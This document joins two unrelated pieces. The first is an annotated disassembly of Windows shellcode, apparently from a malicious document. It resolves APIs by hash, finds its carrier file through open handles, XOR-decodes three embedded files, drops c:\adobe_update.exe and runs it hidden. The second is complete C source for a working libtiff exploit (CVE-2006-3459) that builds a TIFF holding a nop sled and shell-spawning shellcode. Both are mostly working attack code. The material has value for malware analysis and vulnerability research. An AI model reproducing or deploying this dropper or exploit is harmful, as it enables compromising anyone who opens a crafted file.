; ---------------------------------------------------------------------------
; start -- 32-bit x86 position-independent shellcode (IDA listing).  The
; `start proc` header lies above this excerpt; `start endp` is below.
;
; What the visible code does, in order:
;   1. Resolves 12 exports of the module found as the SECOND entry of the PEB
;      InInitializationOrderModuleList, by ROR-13/ADD hashing every export
;      name; each hash in the table below is overwritten in place with the
;      resolved address.
;   2. Probes handle values 1,2,3,... with GetFileSize until one is a file
;      larger than 1000h bytes, reads it whole into a GlobalAlloc'd buffer
;      and scans it for the 8-byte markers "FVCK",19890604h (payload start)
;      and "KaKa",19811106h (payload end).
;   3. XOR-decodes the span between the markers with a descending byte key,
;      then splits it into three files -- c:\adobe_update.exe, c:\data.EXE,
;      c:\data.BIN -- using three length dwords at the head of the data.
;   4. Runs "cmd /c c:\adobe_update.exe <string returned by slot 0>" through
;      WinExec, then TerminateProcess(-1, 0) from the trailer bytes.
;
; API identification: a slot is named below only where its hash equals
; ROR-13("name") recomputed from the constants in this listing.  Slot 0
; (7C80224Ch) and slot 9 (7B8F17E6h) matched none of the names tried and are
; left unidentified -- NOTE(review): confirm against the kernel32 export list.
;
; Data/scratch layout relative to EDI after `sub edi, 38h` (EDI then points
; one byte past the opcode byte of the initial `call $+5`):
;   [edi]            scratch: handle of c:\adobe_update.exe
;   [edi+4]          scratch: size of the located file (overwrites the
;                    already-executed push/jmp bytes -> needs writable code)
;   [edi+8+4*i]      slot i, i=0..11: hash, replaced by the resolved address
;   [edi+38h]        "cmd /c c:\adobe_update.exe"   ([edi+3Fh] = the path)
;   [edi+58h]        "c:\data.EXE"         [edi+68h]  "c:\data.BIN"
;   [edi+7Ch]        read buffer           [edi+80h]  probe handle (also the
;                    lpFileSizeHigh out-param of GetFileSize)
;   [edi+90h]        bytes read            [edi+94h]  payload start
;   [edi+98h]        payload end           [edi+9Ch],[edi+0A0h] handles #2,#3
;   [edi+0A4h..0ACh] lengths of the three embedded files
; Everything from [edi+7Ch] upward lies inside the code at loc_401099 and
; after, which has already executed by then and is never re-entered.
; ---------------------------------------------------------------------------
call $+5                         ; pushes the address of `push 0Ch` (PIC anchor; rel32 = 0)
push 0Ch                         ; 12 = number of hash slots in the table below
jmp short loc_401099
; --- embedded data.  IDA's dword grouping is shifted by the 3-byte db; read
; as 12 little-endian dwords starting at the db, the slots are:
;   0: 7C80224Ch (unidentified)      1: 0E8AFE98h WinExec
;   2: 76DA08ACh SetFilePointer      3: 78B5B983h TerminateProcess
;   4: 0DF7D9BADh GetFileSize        5: 0FFD97FBh CloseHandle
;   6: 0E88A49EAh _lcreat            7: 0E9238ADBh _lwrite
;   8: 10FA6516h ReadFile            9: 7B8F17E6h (unidentified)
;  10: 7CB922F6h GlobalFree         11: 0C0397ECh GlobalAlloc
; followed by the three NUL-terminated strings named in the header.
db 4Ch, 22h, 80h                 ; first 3 bytes of slot 0
dd 8AFE987Ch, 0DA08AC0Eh, 0B5B98376h, 7D9BAD78h   ; end of slot 0, slots 1..3, start of 4
dd 0FD97FBDFh, 8A49EA0Fh, 238ADBE8h, 0FA6516E9h   ; rest of slot 4, slots 5..7, start of 8
dd 8F17E610h, 0B922F67Bh, 397EC7Ch, 646D630Ch     ; rest of slot 8, slots 9..11, then "cmd"
dd 20632F20h, 615C3A63h, 65626F64h, 6470755Fh     ; " /c c:\adobe_upd"
dd 2E657461h, 657865h, 0                          ; "ate.exe", NUL padding
dd 5C3A6300h, 61746164h, 4558452Eh, 0             ; NUL, "c:\data.EXE", NULs
dd 5C3A6300h, 61746164h, 4E49622Eh, 0             ; NUL, "c:\data.BIN", NULs
db 0
; --- locate the module to resolve from -------------------------------------
loc_401099:
pop ecx                          ; ECX = 0Ch, the slot count
pop edi                          ; EDI = address of `push 0Ch`
scasd                            ; EDI += 4: skip push/jmp, now at slot 0's hash
mov eax, fs:30h                  ; PEB
mov eax, [eax+0Ch]               ; PEB->Ldr
mov esi, [eax+1Ch]               ; Ldr->InInitializationOrderModuleList.Flink
lodsd                            ; EAX = the list's SECOND entry
mov ebp, [eax+8]                 ; EBP = its DllBase.  NOTE(review): that is kernel32.dll on XP/2003 only; on Windows 7+ the second entry is KernelBase.dll and the lookups below will not find these names
; --- resolve one slot per iteration: walk the export name table -------------
loc_4010AB:
push ecx                         ; keep the outer slot counter across the inner loops
mov esi, [ebp+3Ch]               ; e_lfanew
mov esi, [esi+ebp+78h]           ; DataDirectory[EXPORT].VirtualAddress
add esi, ebp                     ; ESI = IMAGE_EXPORT_DIRECTORY*
push esi
mov esi, [esi+20h]               ; AddressOfNames RVA
add esi, ebp
xor ecx, ecx
dec ecx                          ; name index starts at -1, pre-incremented below
loc_4010BE:
inc ecx
lodsd                            ; next name RVA.  No bound against NumberOfNames: an unmatched hash walks off the end of the table
add eax, ebp                     ; EAX -> export name
xor ebx, ebx                     ; EBX = running hash
loc_4010C4:
movsx edx, byte ptr [eax]
cmp dl, dh                       ; DH holds the sign extension, so this stops at NUL (and also at a 0FFh byte)
jz short loc_4010D3
ror ebx, 0Dh
add ebx, edx                     ; hash = ror13(hash) + c
inc eax
jmp short loc_4010C4
loc_4010D3:
cmp ebx, [edi]                   ; equal to the current slot's hash?
jnz short loc_4010BE
pop esi                          ; export directory
mov ebx, [esi+24h]               ; AddressOfNameOrdinals
add ebx, ebp
mov cx, [ebx+ecx*2]              ; 16-bit ordinal; the upper half of ECX is already 0 (it was the name index)
mov ebx, [esi+1Ch]               ; AddressOfFunctions
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp                     ; absolute address of the export
stosd                            ; overwrite the hash with it; EDI -> next slot
pop ecx
loop loc_4010AB                  ; all 12 slots
sub edi, 38h                     ; EDI <- data base (see layout in the header)
xor esi, esi
; --- find an already-open file larger than 1000h bytes by probing handles ---
loc_4010F4:
inc esi                          ; next candidate handle value.  Never bounded: spins forever if no handle qualifies
lea eax, [edi+80h]
push eax                         ; lpFileSizeHigh
push esi                         ; hFile
call dword ptr [edi+18h]         ; GetFileSize
cmp eax, 0FFFFFFFFh              ; INVALID_FILE_SIZE: not a usable file handle
jz short loc_4010F4
cmp eax, 1000h
jbe short loc_4010F4             ; too small to be the carrier document
mov [edi+4], eax                 ; file size
mov [edi+80h], esi               ; the handle
push dword ptr [edi+4]
push 40h                         ; flags 40h
call dword ptr [edi+34h]         ; GlobalAlloc(40h, size)
mov [edi+7Ch], eax               ; buffer (never checked for NULL)
push 0
push 0
push 0
push dword ptr [edi+80h]
call dword ptr [edi+10h]         ; SetFilePointer(h, 0, NULL, FILE_BEGIN)
cmp eax, 0FFFFFFFFh
jz short loc_40118B              ; seek failed: free the buffer and try the next handle
push 0
lea ebx, [edi+90h]
push ebx                         ; &bytesRead
push dword ptr [edi+4]           ; size
push dword ptr [edi+7Ch]         ; buffer
push dword ptr [edi+80h]         ; handle
call dword ptr [edi+28h]         ; ReadFile(h, buf, size, &bytesRead, NULL)
mov ecx, [edi+90h]
sub ecx, 0Ah                     ; scan budget keeps the 8-byte compares inside the buffer; wraps if bytesRead < 10
mov eax, [edi+7Ch]
; --- scan for "FVCK",19890604h: start of the embedded payload ---------------
loc_401158:
inc eax                          ; pre-increment: buf[0] is never tested
cmp dword ptr [eax], 4B435646h   ; "FVCK"
jnz short loc_40116A
cmp dword ptr [eax+4], 19890604h ; second marker dword
jz short loc_40116E
loc_40116A:
loop loc_401158
jmp short loc_40118B             ; not found in this file
loc_40116E:
add eax, 8
mov [edi+94h], eax               ; payload start = just past the 8-byte marker
; --- keep scanning for "KaKa",19811106h: end of the payload -----------------
loc_401177:
inc eax
cmp dword ptr [eax], 614B614Bh   ; "KaKa"
jnz short loc_401189
cmp dword ptr [eax+4], 19811106h
jz short loc_401197
loc_401189:
loop loc_401177                  ; ECX carries over from the first scan
; --- release the buffer and retry with the next handle ----------------------
loc_40118B:
push dword ptr [edi+7Ch]
call dword ptr [edi+30h]         ; GlobalFree(buf)
jnz loc_4010F4                   ; NOTE(review): branches on ZF as left behind by GlobalFree -- a `call` sets no flags.  If ZF happens to be set this falls through into loc_401197 with a stale EAX
; --- payload located: EAX -> "KaKa" marker ----------------------------------
loc_401197:
mov [edi+98h], eax               ; payload end
push 2                           ; attribute 2
lea esi, [edi+3Fh]               ; "c:\adobe_update.exe"
push esi
call dword ptr [edi+20h]         ; _lcreat(path, 2)
mov [edi], eax                   ; handle #1
push 2
lea esi, [edi+58h]               ; "c:\data.EXE"
push esi
call dword ptr [edi+20h]         ; _lcreat
mov [edi+9Ch], eax               ; handle #2
push 2
lea esi, [edi+68h]               ; "c:\data.BIN"
push esi
call dword ptr [edi+20h]         ; _lcreat
mov [edi+0A0h], eax              ; handle #3 (none of the three results is checked)
mov ebx, [edi+98h]
sub ebx, [edi+94h]               ; EBX = payload length
mov eax, [edi+94h]
; --- decode in place: byte i ^= (len - i) & 0FFh, i.e. key runs len, len-1, ..., 1
loc_4011D8:
xor [eax], bl
dec ebx
inc eax
cmp ebx, 0
jnz short loc_4011D8
; --- decoded layout: len1, len2, len3 (dwords) then the three bodies back to back
mov eax, [edi+94h]
mov ecx, [eax]
mov [edi+0A4h], ecx              ; len1
add eax, 4
mov ecx, [eax]
mov [edi+0A8h], ecx              ; len2
add eax, 4
mov ecx, [eax]
mov [edi+0ACh], ecx              ; len3
add eax, 4
mov esi, eax                     ; ESI -> body #1
push dword ptr [edi+0A4h]
push esi
push dword ptr [edi]
call dword ptr [edi+24h]         ; _lwrite(h1, body1, len1)
push dword ptr [edi+0A8h]
add esi, [edi+0A4h]              ; ESI -> body #2
push esi
push dword ptr [edi+9Ch]
call dword ptr [edi+24h]         ; _lwrite(h2, body2, len2)
push dword ptr [edi+0ACh]
add esi, [edi+0A8h]              ; ESI -> body #3
push esi
push dword ptr [edi+0A0h]
call dword ptr [edi+24h]         ; _lwrite(h3, body3, len3)
push dword ptr [edi]
call dword ptr [edi+1Ch]         ; CloseHandle(h1)
push dword ptr [edi+9Ch]
call dword ptr [edi+1Ch]         ; CloseHandle(h2)
push dword ptr [edi+0A0h]
call dword ptr [edi+1Ch]         ; CloseHandle(h3)
call dword ptr [edi+8]           ; slot 0, called with no arguments; its result is used below as a NUL-terminated string.  Unidentified: GetCommandLineA would fit the usage but its ROR-13 hash is not 7C80224Ch
push eax                         ; save that string pointer
lea esi, [edi+3Fh]               ; the path inside "cmd /c c:\adobe_update.exe"
mov edx, esi
; --- find the NUL that ends the path ----------------------------------------
loc_401262:
mov al, [edx]
inc edx
or al, al
jz short loc_40126B
jmp short loc_401262
loc_40126B:
mov byte ptr [edx-1], 20h        ; replace the NUL with a space
pop ecx                          ; ECX -> string returned by slot 0
; --- append it.  Unbounded: it overwrites the (already used) data and code that follow; roughly 500 bytes would reach this very loop
loc_401270:
mov al, [ecx]
or al, al
jz short loc_40127C
mov [edx], al
inc edx
inc ecx
jmp short loc_401270
loc_40127C:
mov [edx], al                    ; AL is 0 here: terminate the new string
sub esi, 7                       ; ESI -> "cmd /c c:\adobe_update.exe <appended>"
; --- WinExec(cmdline, 0) entered by jmp with a hand-built return address ----
call $+5                         ; push the address of the `add` below
add [esp+4+var_4], 0Dh           ; +13 = size of add/push/push/push/jmp: the return address becomes the bytes after `start endp`
push 0                           ; uCmdShow = 0 (SW_HIDE)
push esi                         ; lpCmdLine
push dword ptr [edi+2Ch]         ; slot 9 (unidentified) occupies WinExec's return-address slot: WinExec's `ret 8` transfers into that function, which in turn returns to the trailer below
jmp dword ptr [edi+0Ch]          ; WinExec
start endp
; --- trailer reached via the chained return above, decoded:
;   6A 00           push 0        ; uExitCode
;   6A FF           push -1       ; hProcess = current-process pseudo-handle
;   FF 57 14        call [edi+14h]; TerminateProcess(-1, 0)
;   90 90 ...       nops, then zero padding
db 6Ah
dd 0FFFF6A00h, 90901457h, 90909090h, 0B58h dup(0)
_text ends
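#include <stdio.h>
#include <string.h>
#include <tiffio.h>
#include <stdlib.h>
#include <stdbool.h>

/*
 * basic exploit for CVE-2006-3459.
 *
 * $ ./a.out
 * [*] creating exploit.tif, target address: 0xb7959000
 * [*] marker tag found at offset 524418.
 * [*] success.
 * $ display exploit.tif
 * uid=1000(taviso) gid=100(users) groups=10(wheel)
 *
 * -- taviso@gentoo.org
 *
 * Mechanics, as written below: a private tag (MARKER) is registered with
 * libtiff so that TIFFSetField() serialises an array of shorts all spelling
 * RETADDR; the single strip is a nop sled ending in the shellcode; once the
 * file is closed, the on-disk tag number is patched to TIFFTAG_DOTRANGE,
 * the tag whose handling is broken in the vulnerable libtiff.
 *
 * NOTE(review): RETADDR is an absolute address read out of one specific
 * process (tif->tif_base, i.e. libtiff's mapping of the file), so the file
 * appears to rely on a 32-bit target without ASLR or NX and RETADDR must be
 * re-derived per machine.
 *
 * Fixes relative to the original listing: a failed malloc() now aborts
 * instead of falling through to memset(NULL, ...); a failed fwrite() of the
 * tag number is an error instead of "success"; the integer RETADDR is no
 * longer passed to %p, the long offset is no longer passed to %d, and the
 * fseek() offsets are computed in long rather than via size_t wrap-around.
 */

/* size of nop sled */
#define SLEDSIZ (2048 << 8)

/* get this address by printing tif->tif_base in a debugger */
#define RETADDR (0xb7919000 + SLEDSIZ/2)

#define MARKER 0xc0de /* this must be unique, make it anything */

/*
 * linux/x86: execve("/bin/sh", {"/bin/sh", "-c", "/usr/bin/id", NULL}, NULL)
 * (push 0x0b / pop eax ... int 0x80).  Bytes kept exactly as published.
 */
unsigned char shellcode[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00"
    "\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73"
    "\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x57\x53\x89\xe1\xcd\x80";

/* the made-up tag libtiff is taught about in main() */
TIFFFieldInfo badfield = {
    MARKER,       /* a unique unsigned short we search for */
    100,          /* number of shorts to read onto stack */
    100,          /* number we want to write into file */
    TIFF_SHORT,   /* data type */
    FIELD_CUSTOM, /* field bit */
    1,            /* okay to change? */
    0,            /* passcount */
    "Exploit"     /* a name, unused */
};

/*
 * Writes exploit.tif into the current directory and patches the marker tag.
 *
 * Returns 0 on success and 1 on any allocation or I/O failure; every failure
 * path closes what it opened before returning.
 */
int main(int argc, char **argv)
{
    TIFF *tif;
    FILE *mod;
    unsigned char *buf;
    unsigned short d;
    unsigned f[badfield.field_readcount], i;
    size_t len = SLEDSIZ + sizeof(shellcode);   /* strip size: sled + shellcode */
    long off;                                   /* file offset of the marker tag */

    (void)argc;
    (void)argv;

    /* RETADDR is an integer expression, so print it as one (same text as %p gave) */
    fprintf(stderr, "[*] creating exploit.tif, target address: %#x\n",
            (unsigned)RETADDR);

    /* prepare a buffer containing address of shellcode */
    for (i = 0; i < badfield.field_readcount; i++)
        f[i] = RETADDR;

    /* open the target exploit file */
    if ((tif = TIFFOpen("exploit.tif", "w")) == NULL) {
        fprintf(stderr, "[!] failed to open target.\n");
        return 1;
    }

    /* teach libtiff about made up tag */
    TIFFMergeFieldInfo(tif, &badfield, 1);

    /* install basic required tags (IMAGEWIDTH is fetched as a 32-bit unsigned, not size_t) */
    TIFFSetField(tif, TIFFTAG_IMAGEWIDTH, (unsigned int)len);
    TIFFSetField(tif, TIFFTAG_IMAGELENGTH, 1);
    TIFFSetField(tif, TIFFTAG_COMPRESSION, COMPRESSION_NONE);
    TIFFSetField(tif, TIFFTAG_PHOTOMETRIC, PHOTOMETRIC_MINISBLACK);

    /* now send buffer containing return addresses */
    TIFFSetField(tif, MARKER, &f);

    if ((buf = malloc(len)) == NULL) {
        /* the original only printed here and went on to memset() a NULL buffer */
        fprintf(stderr, "[!] sorry, memory allocation error.\n");
        TIFFClose(tif);
        return 1;
    }
    memset(buf, 0x90, SLEDSIZ);
    memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));

    /* disguise nop sled and shellcode as image data */
    TIFFWriteEncodedStrip(tif, 0, buf, len);
    TIFFClose(tif);
    free(buf);

    /* okay, now open the file to find the marker tag */
    if ((mod = fopen("exploit.tif", "r+")) == NULL) {
        fprintf(stderr, "[!] failed to open target.\n");
        return 1;
    }

    /*
     * Find MARKER by reading a short at every byte offset.  The tag number was
     * written in host byte order and is read back the same way.
     */
    for (;;) {
        if (fread(&d, sizeof(short), 1, mod) < 1) {
            fprintf(stderr, "[!] failed to find marker.\n");
            fclose(mod);
            return 1;
        }
        if (d == MARKER)
            break;
        /* step back one byte so the next read overlaps this one */
        if (fseek(mod, 1 - (long)sizeof(short), SEEK_CUR) == -1) {
            fprintf(stderr, "[!] failed to reposition file.\n");
            fclose(mod);
            return 1;
        }
    }

    off = ftell(mod) - (long)sizeof(short);
    fprintf(stderr, "[*] marker tag found at offset %ld.\n", off);

    /* rewind ready to overwrite it */
    if (fseek(mod, off, SEEK_SET) == -1) {
        fprintf(stderr, "[!] failed to reposition file.\n");
        fclose(mod);
        return 1;
    }

    /* i'll use dot range */
    d = TIFFTAG_DOTRANGE;

    /* write it in; a short write leaves the harmless marker tag in place, so fail loudly */
    if (fwrite(&d, sizeof(short), 1, mod) < 1) {
        fprintf(stderr, "[!] failed to write new tag number.\n");
        fclose(mod);
        return 1;
    }
    fclose(mod);

    fprintf(stderr, "[*] success.\n");
    return 0;
}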